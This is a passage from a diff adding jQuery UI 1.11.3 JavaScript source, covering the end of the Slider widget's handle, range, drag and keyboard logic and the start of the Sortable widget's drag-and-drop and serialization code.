+			existingHandles = this.element.find( ".ui-slider-handle" ).addClass( "ui-state-default ui-corner-all" ),
+			handle = "<span class='ui-slider-handle ui-state-default ui-corner-all' tabindex='0'></span>",
+			handles = [];
+
+		handleCount = ( options.values && options.values.length ) || 1;
+
+		if ( existingHandles.length > handleCount ) {
+			existingHandles.slice( handleCount ).remove();
+			existingHandles = existingHandles.slice( 0, handleCount );
+		}
+
+		for ( i = existingHandles.length; i < handleCount; i++ ) {
+			handles.push( handle );
+		}
+
+		this.handles = existingHandles.add( $( handles.join( "" ) ).appendTo( this.element ) );
+
+		this.handle = this.handles.eq( 0 );
+
+		this.handles.each(function( i ) {
+			$( this ).data( "ui-slider-handle-index", i );
+		});
+	},
+
+	_createRange: function() {
+		var options = this.options,
+			classes = "";
+
+		if ( options.range ) {
+			if ( options.range === true ) {
+				if ( !options.values ) {
+					options.values = [ this._valueMin(), this._valueMin() ];
+				} else if ( options.values.length && options.values.length !== 2 ) {
+					options.values = [ options.values[0], options.values[0] ];
+				} else if ( $.isArray( options.values ) ) {
+					options.values = options.values.slice(0);
+				}
+			}
+
+			if ( !this.range || !this.range.length ) {
+				this.range = $( "<div></div>" )
+					.appendTo( this.element );
+
+				classes = "ui-slider-range" +
+				// note: this isn't the most fittingly semantic framework class for this element,
+				// but worked best visually with a variety of themes
+				" ui-widget-header ui-corner-all";
+			} else {
+				this.range.removeClass( "ui-slider-range-min ui-slider-range-max" )
+					// Handle range switching from true to min/max
+					.css({
+						"left": "",
+						"bottom": ""
+					});
+			}
+
+			this.range.addClass( classes +
+				( ( options.range === "min" || options.range === "max" ) ? " ui-slider-range-" + options.range : "" ) );
+		} else {
+			if ( this.range ) {
+				this.range.remove();
+			}
+			this.range = null;
+		}
+	},
+
+	_setupEvents: function() {
+		this._off( this.handles );
+		this._on( this.handles, this._handleEvents );
+		this._hoverable( this.handles );
+		this._focusable( this.handles );
+	},
+
+	_destroy: function() {
+		this.handles.remove();
+		if ( this.range ) {
+			this.range.remove();
+		}
+
+		this.element
+			.removeClass( "ui-slider" +
+				" ui-slider-horizontal" +
+				" ui-slider-vertical" +
+				" ui-widget" +
+				" ui-widget-content" +
+				" ui-corner-all" );
+
+		this._mouseDestroy();
+	},
+
+	_mouseCapture: function( event ) {
+		var position, normValue, distance, closestHandle, index, allowed, offset, mouseOverHandle,
+			that = this,
+			o = this.options;
+
+		if ( o.disabled ) {
+			return false;
+		}
+
+		this.elementSize = {
+			width: this.element.outerWidth(),
+			height: this.element.outerHeight()
+		};
+		this.elementOffset = this.element.offset();
+
+		position = { x: event.pageX, y: event.pageY };
+		normValue = this._normValueFromMouse( position );
+		distance = this._valueMax() - this._valueMin() + 1;
+		this.handles.each(function( i ) {
+			var thisDistance = Math.abs( normValue - that.values(i) );
+			if (( distance > thisDistance ) ||
+				( distance === thisDistance &&
+					(i === that._lastChangedValue || that.values(i) === o.min ))) {
+				distance = thisDistance;
+				closestHandle = $( this );
+				index = i;
+			}
+		});
+
+		allowed = this._start( event, index );
+		if ( allowed === false ) {
+			return false;
+		}
+		this._mouseSliding = true;
+
+		this._handleIndex = index;
+
+		closestHandle
+			.addClass( "ui-state-active" )
+			.focus();
+
+		offset = closestHandle.offset();
+		mouseOverHandle = !$( event.target ).parents().addBack().is( ".ui-slider-handle" );
+		this._clickOffset = mouseOverHandle ? { left: 0, top: 0 } : {
+			left: event.pageX - offset.left - ( closestHandle.width() / 2 ),
+			top: event.pageY - offset.top -
+				( closestHandle.height() / 2 ) -
+				( parseInt( closestHandle.css("borderTopWidth"), 10 ) || 0 ) -
+				( parseInt( closestHandle.css("borderBottomWidth"), 10 ) || 0) +
+				( parseInt( closestHandle.css("marginTop"), 10 ) || 0)
+		};
+
+		if ( !this.handles.hasClass( "ui-state-hover" ) ) {
+			this._slide( event, index, normValue );
+		}
+		this._animateOff = true;
+		return true;
+	},
+
+	_mouseStart: function() {
+		return true;
+	},
+
+	_mouseDrag: function( event ) {
+		var position = { x: event.pageX, y: event.pageY },
+			normValue = this._normValueFromMouse( position );
+
+		this._slide( event, this._handleIndex, normValue );
+
+		return false;
+	},
+
+	_mouseStop: function( event ) {
+		this.handles.removeClass( "ui-state-active" );
+		this._mouseSliding = false;
+
+		this._stop( event, this._handleIndex );
+		this._change( event, this._handleIndex );
+
+		this._handleIndex = null;
+		this._clickOffset = null;
+		this._animateOff = false;
+
+		return false;
+	},
+
+	_detectOrientation: function() {
+		this.orientation = ( this.options.orientation === "vertical" ) ? "vertical" : "horizontal";
+	},
+
+	_normValueFromMouse: function( position ) {
+		var pixelTotal,
+			pixelMouse,
+			percentMouse,
+			valueTotal,
+			valueMouse;
+
+		if ( this.orientation === "horizontal" ) {
+			pixelTotal = this.elementSize.width;
+			pixelMouse = position.x - this.elementOffset.left - ( this._clickOffset ? this._clickOffset.left : 0 );
+		} else {
+			pixelTotal = this.elementSize.height;
+			pixelMouse = position.y - this.elementOffset.top - ( this._clickOffset ? this._clickOffset.top : 0 );
+		}
+
+		percentMouse = ( pixelMouse / pixelTotal );
+		if ( percentMouse > 1 ) {
+			percentMouse = 1;
+		}
+		if ( percentMouse < 0 ) {
+			percentMouse = 0;
+		}
+		if ( this.orientation === "vertical" ) {
+			percentMouse = 1 - percentMouse;
+		}
+
+		valueTotal = this._valueMax() - this._valueMin();
+		valueMouse = this._valueMin() + percentMouse * valueTotal;
+
+		return this._trimAlignValue( valueMouse );
+	},
+
+	_start: function( event, index ) {
+		var uiHash = {
+			handle: this.handles[ index ],
+			value: this.value()
+		};
+		if ( this.options.values && this.options.values.length ) {
+			uiHash.value = this.values( index );
+			uiHash.values = this.values();
+		}
+		return this._trigger( "start", event, uiHash );
+	},
+
+	_slide: function( event, index, newVal ) {
+		var otherVal,
+			newValues,
+			allowed;
+
+		if ( this.options.values && this.options.values.length ) {
+			otherVal = this.values( index ? 0 : 1 );
+
+			if ( ( this.options.values.length === 2 && this.options.range === true ) &&
+					( ( index === 0 && newVal > otherVal) || ( index === 1 && newVal < otherVal ) )
+				) {
+				newVal = otherVal;
+			}
+
+			if ( newVal !== this.values( index ) ) {
+				newValues = this.values();
+				newValues[ index ] = newVal;
+				// A slide can be canceled by returning false from the slide callback
+				allowed = this._trigger( "slide", event, {
+					handle: this.handles[ index ],
+					value: newVal,
+					values: newValues
+				} );
+				otherVal = this.values( index ? 0 : 1 );
+				if ( allowed !== false ) {
+					this.values( index, newVal );
+				}
+			}
+		} else {
+			if ( newVal !== this.value() ) {
+				// A slide can be canceled by returning false from the slide callback
+				allowed = this._trigger( "slide", event, {
+					handle: this.handles[ index ],
+					value: newVal
+				} );
+				if ( allowed !== false ) {
+					this.value( newVal );
+				}
+			}
+		}
+	},
+
+	_stop: function( event, index ) {
+		var uiHash = {
+			handle: this.handles[ index ],
+			value: this.value()
+		};
+		if ( this.options.values && this.options.values.length ) {
+			uiHash.value = this.values( index );
+			uiHash.values = this.values();
+		}
+
+		this._trigger( "stop", event, uiHash );
+	},
+
+	_change: function( event, index ) {
+		if ( !this._keySliding && !this._mouseSliding ) {
+			var uiHash = {
+				handle: this.handles[ index ],
+				value: this.value()
+			};
+			if ( this.options.values && this.options.values.length ) {
+				uiHash.value = this.values( index );
+				uiHash.values = this.values();
+			}
+
+			//store the last changed value index for reference when handles overlap
+			this._lastChangedValue = index;
+
+			this._trigger( "change", event, uiHash );
+		}
+	},
+
+	value: function( newValue ) {
+		if ( arguments.length ) {
+			this.options.value = this._trimAlignValue( newValue );
+			this._refreshValue();
+			this._change( null, 0 );
+			return;
+		}
+
+		return this._value();
+	},
+
+	values: function( index, newValue ) {
+		var vals,
+			newValues,
+			i;
+
+		if ( arguments.length > 1 ) {
+			this.options.values[ index ] = this._trimAlignValue( newValue );
+			this._refreshValue();
+			this._change( null, index );
+			return;
+		}
+
+		if ( arguments.length ) {
+			if ( $.isArray( arguments[ 0 ] ) ) {
+				vals = this.options.values;
+				newValues = arguments[ 0 ];
+				for ( i = 0; i < vals.length; i += 1 ) {
+					vals[ i ] = this._trimAlignValue( newValues[ i ] );
+					this._change( null, i );
+				}
+				this._refreshValue();
+			} else {
+				if ( this.options.values && this.options.values.length ) {
+					return this._values( index );
+				} else {
+					return this.value();
+				}
+			}
+		} else {
+			return this._values();
+		}
+	},
+
+	_setOption: function( key, value ) {
+		var i,
+			valsLength = 0;
+
+		if ( key === "range" && this.options.range === true ) {
+			if ( value === "min" ) {
+				this.options.value = this._values( 0 );
+				this.options.values = null;
+			} else if ( value === "max" ) {
+				this.options.value = this._values( this.options.values.length - 1 );
+				this.options.values = null;
+			}
+		}
+
+		if ( $.isArray( this.options.values ) ) {
+			valsLength = this.options.values.length;
+		}
+
+		if ( key === "disabled" ) {
+			this.element.toggleClass( "ui-state-disabled", !!value );
+		}
+
+		this._super( key, value );
+
+		switch ( key ) {
+			case "orientation":
+				this._detectOrientation();
+				this.element
+					.removeClass( "ui-slider-horizontal ui-slider-vertical" )
+					.addClass( "ui-slider-" + this.orientation );
+				this._refreshValue();
+
+				// Reset positioning from previous orientation
+				this.handles.css( value === "horizontal" ? "bottom" : "left", "" );
+				break;
+			case "value":
+				this._animateOff = true;
+				this._refreshValue();
+				this._change( null, 0 );
+				this._animateOff = false;
+				break;
+			case "values":
+				this._animateOff = true;
+				this._refreshValue();
+				for ( i = 0; i < valsLength; i += 1 ) {
+					this._change( null, i );
+				}
+				this._animateOff = false;
+				break;
+			case "step":
+			case "min":
+			case "max":
+				this._animateOff = true;
+				this._calculateNewMax();
+				this._refreshValue();
+				this._animateOff = false;
+				break;
+			case "range":
+				this._animateOff = true;
+				this._refresh();
+				this._animateOff = false;
+				break;
+		}
+	},
+
+	//internal value getter
+	// _value() returns value trimmed by min and max, aligned by step
+	_value: function() {
+		var val = this.options.value;
+		val = this._trimAlignValue( val );
+
+		return val;
+	},
+
+	//internal values getter
+	// _values() returns array of values trimmed by min and max, aligned by step
+	// _values( index ) returns single value trimmed by min and max, aligned by step
+	_values: function( index ) {
+		var val,
+			vals,
+			i;
+
+		if ( arguments.length ) {
+			val = this.options.values[ index ];
+			val = this._trimAlignValue( val );
+
+			return val;
+		} else if ( this.options.values && this.options.values.length ) {
+			// .slice() creates a copy of the array
+			// this copy gets trimmed by min and max and then returned
+			vals = this.options.values.slice();
+			for ( i = 0; i < vals.length; i += 1) {
+				vals[ i ] = this._trimAlignValue( vals[ i ] );
+			}
+
+			return vals;
+		} else {
+			return [];
+		}
+	},
+
+	// returns the step-aligned value that val is closest to, between (inclusive) min and max
+	_trimAlignValue: function( val ) {
+		if ( val <= this._valueMin() ) {
+			return this._valueMin();
+		}
+		if ( val >= this._valueMax() ) {
+			return this._valueMax();
+		}
+		var step = ( this.options.step > 0 ) ? this.options.step : 1,
+			valModStep = (val - this._valueMin()) % step,
+			alignValue = val - valModStep;
+
+		if ( Math.abs(valModStep) * 2 >= step ) {
+			alignValue += ( valModStep > 0 ) ? step : ( -step );
+		}
+
+		// Since JavaScript has problems with large floats, round
+		// the final value to 5 digits after the decimal point (see #4124)
+		return parseFloat( alignValue.toFixed(5) );
+	},
+
+	_calculateNewMax: function() {
+		var max = this.options.max,
+			min = this._valueMin(),
+			step = this.options.step,
+			aboveMin = Math.floor( ( max - min ) / step ) * step;
+		max = aboveMin + min;
+		this.max = parseFloat( max.toFixed( this._precision() ) );
+	},
+
+	_precision: function() {
+		var precision = this._precisionOf( this.options.step );
+		if ( this.options.min !== null ) {
+			precision = Math.max( precision, this._precisionOf( this.options.min ) );
+		}
+		return precision;
+	},
+
+	_precisionOf: function( num ) {
+		var str = num.toString(),
+			decimal = str.indexOf( "." );
+		return decimal === -1 ? 0 : str.length - decimal - 1;
+	},
+
+	_valueMin: function() {
+		return this.options.min;
+	},
+
+	_valueMax: function() {
+		return this.max;
+	},
+
+	_refreshValue: function() {
+		var lastValPercent, valPercent, value, valueMin, valueMax,
+			oRange = this.options.range,
+			o = this.options,
+			that = this,
+			animate = ( !this._animateOff ) ? o.animate : false,
+			_set = {};
+
+		if ( this.options.values && this.options.values.length ) {
+			this.handles.each(function( i ) {
+				valPercent = ( that.values(i) - that._valueMin() ) / ( that._valueMax() - that._valueMin() ) * 100;
+				_set[ that.orientation === "horizontal" ? "left" : "bottom" ] = valPercent + "%";
+				$( this ).stop( 1, 1 )[ animate ? "animate" : "css" ]( _set, o.animate );
+				if ( that.options.range === true ) {
+					if ( that.orientation === "horizontal" ) {
+						if ( i === 0 ) {
+							that.range.stop( 1, 1 )[ animate ? "animate" : "css" ]( { left: valPercent + "%" }, o.animate );
+						}
+						if ( i === 1 ) {
+							that.range[ animate ? "animate" : "css" ]( { width: ( valPercent - lastValPercent ) + "%" }, { queue: false, duration: o.animate } );
+						}
+					} else {
+						if ( i === 0 ) {
+							that.range.stop( 1, 1 )[ animate ? "animate" : "css" ]( { bottom: ( valPercent ) + "%" }, o.animate );
+						}
+						if ( i === 1 ) {
+							that.range[ animate ? "animate" : "css" ]( { height: ( valPercent - lastValPercent ) + "%" }, { queue: false, duration: o.animate } );
+						}
+					}
+				}
+				lastValPercent = valPercent;
+			});
+		} else {
+			value = this.value();
+			valueMin = this._valueMin();
+			valueMax = this._valueMax();
+			valPercent = ( valueMax !== valueMin ) ?
+					( value - valueMin ) / ( valueMax - valueMin ) * 100 :
+					0;
+			_set[ this.orientation === "horizontal" ? "left" : "bottom" ] = valPercent + "%";
+			this.handle.stop( 1, 1 )[ animate ? "animate" : "css" ]( _set, o.animate );
+
+			if ( oRange === "min" && this.orientation === "horizontal" ) {
+				this.range.stop( 1, 1 )[ animate ? "animate" : "css" ]( { width: valPercent + "%" }, o.animate );
+			}
+			if ( oRange === "max" && this.orientation === "horizontal" ) {
+				this.range[ animate ? "animate" : "css" ]( { width: ( 100 - valPercent ) + "%" }, { queue: false, duration: o.animate } );
+			}
+			if ( oRange === "min" && this.orientation === "vertical" ) {
+				this.range.stop( 1, 1 )[ animate ? "animate" : "css" ]( { height: valPercent + "%" }, o.animate );
+			}
+			if ( oRange === "max" && this.orientation === "vertical" ) {
+				this.range[ animate ? "animate" : "css" ]( { height: ( 100 - valPercent ) + "%" }, { queue: false, duration: o.animate } );
+			}
+		}
+	},
+
+	_handleEvents: {
+		keydown: function( event ) {
+			var allowed, curVal, newVal, step,
+				index = $( event.target ).data( "ui-slider-handle-index" );
+
+			switch ( event.keyCode ) {
+				case $.ui.keyCode.HOME:
+				case $.ui.keyCode.END:
+				case $.ui.keyCode.PAGE_UP:
+				case $.ui.keyCode.PAGE_DOWN:
+				case $.ui.keyCode.UP:
+				case $.ui.keyCode.RIGHT:
+				case $.ui.keyCode.DOWN:
+				case $.ui.keyCode.LEFT:
+					event.preventDefault();
+					if ( !this._keySliding ) {
+						this._keySliding = true;
+						$( event.target ).addClass( "ui-state-active" );
+						allowed = this._start( event, index );
+						if ( allowed === false ) {
+							return;
+						}
+					}
+					break;
+			}
+
+			step = this.options.step;
+			if ( this.options.values && this.options.values.length ) {
+				curVal = newVal = this.values( index );
+			} else {
+				curVal = newVal = this.value();
+			}
+
+			switch ( event.keyCode ) {
+				case $.ui.keyCode.HOME:
+					newVal = this._valueMin();
+					break;
+				case $.ui.keyCode.END:
+					newVal = this._valueMax();
+					break;
+				case $.ui.keyCode.PAGE_UP:
+					newVal = this._trimAlignValue(
+						curVal + ( ( this._valueMax() - this._valueMin() ) / this.numPages )
+					);
+					break;
+				case $.ui.keyCode.PAGE_DOWN:
+					newVal = this._trimAlignValue(
+						curVal - ( (this._valueMax() - this._valueMin()) / this.numPages ) );
+					break;
+				case $.ui.keyCode.UP:
+				case $.ui.keyCode.RIGHT:
+					if ( curVal === this._valueMax() ) {
+						return;
+					}
+					newVal = this._trimAlignValue( curVal + step );
+					break;
+				case $.ui.keyCode.DOWN:
+				case $.ui.keyCode.LEFT:
+					if ( curVal === this._valueMin() ) {
+						return;
+					}
+					newVal = this._trimAlignValue( curVal - step );
+					break;
+			}
+
+			this._slide( event, index, newVal );
+		},
+		keyup: function( event ) {
+			var index = $( event.target ).data( "ui-slider-handle-index" );
+
+			if ( this._keySliding ) {
+				this._keySliding = false;
+				this._stop( event, index );
+				this._change( event, index );
+				$( event.target ).removeClass( "ui-state-active" );
+			}
+		}
+	}
+});
+
+
+/*!
+ * jQuery UI Sortable 1.11.3
+ * http://jqueryui.com
+ *
+ * Copyright jQuery Foundation and other contributors
+ * Released under the MIT license.
+ * http://jquery.org/license
+ *
+ * http://api.jqueryui.com/sortable/
+ */
+
+
+var sortable = $.widget("ui.sortable", $.ui.mouse, {
+	version: "1.11.3",
+	widgetEventPrefix: "sort",
+	ready: false,
+	options: {
+		appendTo: "parent",
+		axis: false,
+		connectWith: false,
+		containment: false,
+		cursor: "auto",
+		cursorAt: false,
+		dropOnEmpty: true,
+		forcePlaceholderSize: false,
+		forceHelperSize: false,
+		grid: false,
+		handle: false,
+		helper: "original",
+		items: "> *",
+		opacity: false,
+		placeholder: false,
+		revert: false,
+		scroll: true,
+		scrollSensitivity: 20,
+		scrollSpeed: 20,
+		scope: "default",
+		tolerance: "intersect",
+		zIndex: 1000,
+
+		// callbacks
+		activate: null,
+		beforeStop: null,
+		change: null,
+		deactivate: null,
+		out: null,
+		over: null,
+		receive: null,
+		remove: null,
+		sort: null,
+		start: null,
+		stop: null,
+		update: null
+	},
+
+	_isOverAxis: function( x, reference, size ) {
+		return ( x >= reference ) && ( x < ( reference + size ) );
+	},
+
+	_isFloating: function( item ) {
+		return (/left|right/).test(item.css("float")) || (/inline|table-cell/).test(item.css("display"));
+	},
+
+	_create: function() {
+
+		var o = this.options;
+		this.containerCache = {};
+		this.element.addClass("ui-sortable");
+
+		//Get the items
+		this.refresh();
+
+		//Let's determine if the items are being displayed horizontally
+		this.floating = this.items.length ? o.axis === "x" || this._isFloating(this.items[0].item) : false;
+
+		//Let's determine the parent's offset
+		this.offset = this.element.offset();
+
+		//Initialize mouse events for interaction
+		this._mouseInit();
+
+		this._setHandleClassName();
+
+		//We're ready to go
+		this.ready = true;
+
+	},
+
+	_setOption: function( key, value ) {
+		this._super( key, value );
+
+		if ( key === "handle" ) {
+			this._setHandleClassName();
+		}
+	},
+
+	_setHandleClassName: function() {
+		this.element.find( ".ui-sortable-handle" ).removeClass( "ui-sortable-handle" );
+		$.each( this.items, function() {
+			( this.instance.options.handle ?
+				this.item.find( this.instance.options.handle ) : this.item )
+				.addClass( "ui-sortable-handle" );
+		});
+	},
+
+	_destroy: function() {
+		this.element
+			.removeClass( "ui-sortable ui-sortable-disabled" )
+			.find( ".ui-sortable-handle" )
+				.removeClass( "ui-sortable-handle" );
+		this._mouseDestroy();
+
+		for ( var i = this.items.length - 1; i >= 0; i-- ) {
+			this.items[i].item.removeData(this.widgetName + "-item");
+		}
+
+		return this;
+	},
+
+	_mouseCapture: function(event, overrideHandle) {
+		var currentItem = null,
+			validHandle = false,
+			that = this;
+
+		if (this.reverting) {
+			return false;
+		}
+
+		if(this.options.disabled || this.options.type === "static") {
+			return false;
+		}
+
+		//We have to refresh the items data once first
+		this._refreshItems(event);
+
+		//Find out if the clicked node (or one of its parents) is a actual item in this.items
+		$(event.target).parents().each(function() {
+			if($.data(this, that.widgetName + "-item") === that) {
+				currentItem = $(this);
+				return false;
+			}
+		});
+		if($.data(event.target, that.widgetName + "-item") === that) {
+			currentItem = $(event.target);
+		}
+
+		if(!currentItem) {
+			return false;
+		}
+		if(this.options.handle && !overrideHandle) {
+			$(this.options.handle, currentItem).find("*").addBack().each(function() {
+				if(this === event.target) {
+					validHandle = true;
+				}
+			});
+			if(!validHandle) {
+				return false;
+			}
+		}
+
+		this.currentItem = currentItem;
+		this._removeCurrentsFromItems();
+		return true;
+
+	},
+
+	_mouseStart: function(event, overrideHandle, noActivation) {
+
+		var i, body,
+			o = this.options;
+
+		this.currentContainer = this;
+
+		//We only need to call refreshPositions, because the refreshItems call has been moved to mouseCapture
+		this.refreshPositions();
+
+		//Create and append the visible helper
+		this.helper = this._createHelper(event);
+
+		//Cache the helper size
+		this._cacheHelperProportions();
+
+		/*
+		 * - Position generation -
+		 * This block generates everything position related - it's the core of draggables.
+		 */
+
+		//Cache the margins of the original element
+		this._cacheMargins();
+
+		//Get the next scrolling parent
+		this.scrollParent = this.helper.scrollParent();
+
+		//The element's absolute position on the page minus margins
+		this.offset = this.currentItem.offset();
+		this.offset = {
+			top: this.offset.top - this.margins.top,
+			left: this.offset.left - this.margins.left
+		};
+
+		$.extend(this.offset, {
+			click: { //Where the click happened, relative to the element
+				left: event.pageX - this.offset.left,
+				top: event.pageY - this.offset.top
+			},
+			parent: this._getParentOffset(),
+			relative: this._getRelativeOffset() //This is a relative to absolute position minus the actual position calculation - only used for relative positioned helper
+		});
+
+		// Only after we got the offset, we can change the helper's position to absolute
+		// TODO: Still need to figure out a way to make relative sorting possible
+		this.helper.css("position", "absolute");
+		this.cssPosition = this.helper.css("position");
+
+		//Generate the original position
+		this.originalPosition = this._generatePosition(event);
+		this.originalPageX = event.pageX;
+		this.originalPageY = event.pageY;
+
+		//Adjust the mouse offset relative to the helper if "cursorAt" is supplied
+		(o.cursorAt && this._adjustOffsetFromHelper(o.cursorAt));
+
+		//Cache the former DOM position
+		this.domPosition = { prev: this.currentItem.prev()[0], parent: this.currentItem.parent()[0] };
+
+		//If the helper is not the original, hide the original so it's not playing any role during the drag, won't cause anything bad this way
+		if(this.helper[0] !== this.currentItem[0]) {
+			this.currentItem.hide();
+		}
+
+		//Create the placeholder
+		this._createPlaceholder();
+
+		//Set a containment if given in the options
+		if(o.containment) {
+			this._setContainment();
+		}
+
+		if( o.cursor && o.cursor !== "auto" ) { // cursor option
+			body = this.document.find( "body" );
+
+			// support: IE
+			this.storedCursor = body.css( "cursor" );
+			body.css( "cursor", o.cursor );
+
+			this.storedStylesheet = $( "<style>*{ cursor: "+o.cursor+" !important; }</style>" ).appendTo( body );
+		}
+
+		if(o.opacity) { // opacity option
+			if (this.helper.css("opacity")) {
+				this._storedOpacity = this.helper.css("opacity");
+			}
+			this.helper.css("opacity", o.opacity);
+		}
+
+		if(o.zIndex) { // zIndex option
+			if (this.helper.css("zIndex")) {
+				this._storedZIndex = this.helper.css("zIndex");
+			}
+			this.helper.css("zIndex", o.zIndex);
+		}
+
+		//Prepare scrolling
+		if(this.scrollParent[0] !== this.document[0] && this.scrollParent[0].tagName !== "HTML") {
+			this.overflowOffset = this.scrollParent.offset();
+		}
+
+		//Call callbacks
+		this._trigger("start", event, this._uiHash());
+
+		//Recache the helper size
+		if(!this._preserveHelperProportions) {
+			this._cacheHelperProportions();
+		}
+
+
+		//Post "activate" events to possible containers
+		if( !noActivation ) {
+			for ( i = this.containers.length - 1; i >= 0; i-- ) {
+				this.containers[ i ]._trigger( "activate", event, this._uiHash( this ) );
+			}
+		}
+
+		//Prepare possible droppables
+		if($.ui.ddmanager) {
+			$.ui.ddmanager.current = this;
+		}
+
+		if ($.ui.ddmanager && !o.dropBehaviour) {
+			$.ui.ddmanager.prepareOffsets(this, event);
+		}
+
+		this.dragging = true;
+
+		this.helper.addClass("ui-sortable-helper");
+		this._mouseDrag(event); //Execute the drag once - this causes the helper not to be visible before getting its correct position
+		return true;
+
+	},
+
+	_mouseDrag: function(event) {
+		var i, item, itemElement, intersection,
+			o = this.options,
+			scrolled = false;
+
+		//Compute the helpers position
+		this.position = this._generatePosition(event);
+		this.positionAbs = this._convertPositionTo("absolute");
+
+		if (!this.lastPositionAbs) {
+			this.lastPositionAbs = this.positionAbs;
+		}
+
+		//Do scrolling
+		if(this.options.scroll) {
+			if(this.scrollParent[0] !== this.document[0] && this.scrollParent[0].tagName !== "HTML") {
+
+				if((this.overflowOffset.top + this.scrollParent[0].offsetHeight) - event.pageY < o.scrollSensitivity) {
+					this.scrollParent[0].scrollTop = scrolled = this.scrollParent[0].scrollTop + o.scrollSpeed;
+				} else if(event.pageY - this.overflowOffset.top < o.scrollSensitivity) {
+					this.scrollParent[0].scrollTop = scrolled = this.scrollParent[0].scrollTop - o.scrollSpeed;
+				}
+
+				if((this.overflowOffset.left + this.scrollParent[0].offsetWidth) - event.pageX < o.scrollSensitivity) {
+					this.scrollParent[0].scrollLeft = scrolled = this.scrollParent[0].scrollLeft + o.scrollSpeed;
+				} else if(event.pageX - this.overflowOffset.left < o.scrollSensitivity) {
+					this.scrollParent[0].scrollLeft = scrolled = this.scrollParent[0].scrollLeft - o.scrollSpeed;
+				}
+
+			} else {
+
+				if(event.pageY - this.document.scrollTop() < o.scrollSensitivity) {
+					scrolled = this.document.scrollTop(this.document.scrollTop() - o.scrollSpeed);
+				} else if(this.window.height() - (event.pageY - this.document.scrollTop()) < o.scrollSensitivity) {
+					scrolled = this.document.scrollTop(this.document.scrollTop() + o.scrollSpeed);
+				}
+
+				if(event.pageX - this.document.scrollLeft() < o.scrollSensitivity) {
+					scrolled = this.document.scrollLeft(this.document.scrollLeft() - o.scrollSpeed);
+				} else if(this.window.width() - (event.pageX - this.document.scrollLeft()) < o.scrollSensitivity) {
+					scrolled = this.document.scrollLeft(this.document.scrollLeft() + o.scrollSpeed);
+				}
+
+			}
+
+			if(scrolled !== false && $.ui.ddmanager && !o.dropBehaviour) {
+				$.ui.ddmanager.prepareOffsets(this, event);
+			}
+		}
+
+		//Regenerate the absolute position used for position checks
+		this.positionAbs = this._convertPositionTo("absolute");
+
+		//Set the helper position
+		if(!this.options.axis || this.options.axis !== "y") {
+			this.helper[0].style.left = this.position.left+"px";
+		}
+		if(!this.options.axis || this.options.axis !== "x") {
+			this.helper[0].style.top = this.position.top+"px";
+		}
+
+		//Rearrange
+		for (i = this.items.length - 1; i >= 0; i--) {
+
+			//Cache variables and intersection, continue if no intersection
+			item = this.items[i];
+			itemElement = item.item[0];
+			intersection = this._intersectsWithPointer(item);
+			if (!intersection) {
+				continue;
+			}
+
+			// Only put the placeholder inside the current Container, skip all
+			// items from other containers. This works because when moving
+			// an item from one container to another the
+			// currentContainer is switched before the placeholder is moved.
+			//
+			// Without this, moving items in "sub-sortables" can cause
+			// the placeholder to jitter between the outer and inner container.
+			if (item.instance !== this.currentContainer) {
+				continue;
+			}
+
+			// cannot intersect with itself
+			// no useless actions that have been done before
+			// no action if the item moved is the parent of the item checked
+			if (itemElement !== this.currentItem[0] &&
+				this.placeholder[intersection === 1 ? "next" : "prev"]()[0] !== itemElement &&
+				!$.contains(this.placeholder[0], itemElement) &&
+				(this.options.type === "semi-dynamic" ? !$.contains(this.element[0], itemElement) : true)
+			) {
+
+				this.direction = intersection === 1 ? "down" : "up";
+
+				if (this.options.tolerance === "pointer" || this._intersectsWithSides(item)) {
+					this._rearrange(event, item);
+				} else {
+					break;
+				}
+
+				this._trigger("change", event, this._uiHash());
+				break;
+			}
+		}
+
+		//Post events to containers
+		this._contactContainers(event);
+
+		//Interconnect with droppables
+		if($.ui.ddmanager) {
+			$.ui.ddmanager.drag(this, event);
+		}
+
+		//Call callbacks
+		this._trigger("sort", event, this._uiHash());
+
+		this.lastPositionAbs = this.positionAbs;
+		return false;
+
+	},
+
+	_mouseStop: function(event, noPropagation) {
+
+		if(!event) {
+			return;
+		}
+
+		//If we are using droppables, inform the manager about the drop
+		if ($.ui.ddmanager && !this.options.dropBehaviour) {
+			$.ui.ddmanager.drop(this, event);
+		}
+
+		if(this.options.revert) {
+			var that = this,
+				cur = this.placeholder.offset(),
+				axis = this.options.axis,
+				animation = {};
+
+			if ( !axis || axis === "x" ) {
+				animation.left = cur.left - this.offset.parent.left - this.margins.left + (this.offsetParent[0] === this.document[0].body ? 0 : this.offsetParent[0].scrollLeft);
+			}
+			if ( !axis || axis === "y" ) {
+				animation.top = cur.top - this.offset.parent.top - this.margins.top + (this.offsetParent[0] === this.document[0].body ? 0 : this.offsetParent[0].scrollTop);
+			}
+			this.reverting = true;
+			$(this.helper).animate( animation, parseInt(this.options.revert, 10) || 500, function() {
+				that._clear(event);
+			});
+		} else {
+			this._clear(event, noPropagation);
+		}
+
+		return false;
+
+	},
+
+	cancel: function() {
+
+		if(this.dragging) {
+
+			this._mouseUp({ target: null });
+
+			if(this.options.helper === "original") {
+				this.currentItem.css(this._storedCSS).removeClass("ui-sortable-helper");
+			} else {
+				this.currentItem.show();
+			}
+
+			//Post deactivating events to containers
+			for (var i = this.containers.length - 1; i >= 0; i--){
+				this.containers[i]._trigger("deactivate", null, this._uiHash(this));
+				if(this.containers[i].containerCache.over) {
+					this.containers[i]._trigger("out", null, this._uiHash(this));
+					this.containers[i].containerCache.over = 0;
+				}
+			}
+
+		}
+
+		if (this.placeholder) {
+			//$(this.placeholder[0]).remove(); would have been the jQuery way - unfortunately, it unbinds ALL events from the original node!
+			if(this.placeholder[0].parentNode) {
+				this.placeholder[0].parentNode.removeChild(this.placeholder[0]);
+			}
+			if(this.options.helper !== "original" && this.helper && this.helper[0].parentNode) {
+				this.helper.remove();
+			}
+
+			$.extend(this, {
+				helper: null,
+				dragging: false,
+				reverting: false,
+				_noFinalSort: null
+			});
+
+			if(this.domPosition.prev) {
+				$(this.domPosition.prev).after(this.currentItem);
+			} else {
+				$(this.domPosition.parent).prepend(this.currentItem);
+			}
+		}
+
+		return this;
+
+	},
+
+	serialize: function(o) {
+
+		var items = this._getItemsAsjQuery(o && o.connected),
+			str = [];
+		o = o || {};
+
+		$(items).each(function() {
+			var res = ($(o.item || this).attr(o.attribute || "id") || "").match(o.expression || (/(.+)[\-=_](.+)/));
+			if (res) {
+				str.push((o.key || res[1]+"[]")+"="+(o.key && o.expression ? res[1] : res[2]));
+			}
+		});
+
+		if(!str.length && o.key) {
+			str.push(o.key + "=");
+		}
+
+		return str.join("&");
+
+	},
+
+	toArray: function(o) {
+
+		var items = this._getItemsAsjQuery(o && o.connected),
+			ret = [];
+
